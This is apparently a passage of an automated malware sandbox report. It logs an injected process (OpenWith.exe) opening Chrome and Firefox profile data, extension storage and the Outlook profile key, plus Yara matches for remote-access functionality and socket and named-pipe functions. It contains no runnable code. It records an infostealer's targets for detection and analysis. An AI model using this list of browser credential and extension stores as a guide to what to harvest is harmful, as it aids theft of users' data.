Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6012, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57814B8 socket,bind, 15_3_00007DF4E57814B8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 15_3_00007DF4E574F83C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034328CDEC CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 16_2_000002034328CDEC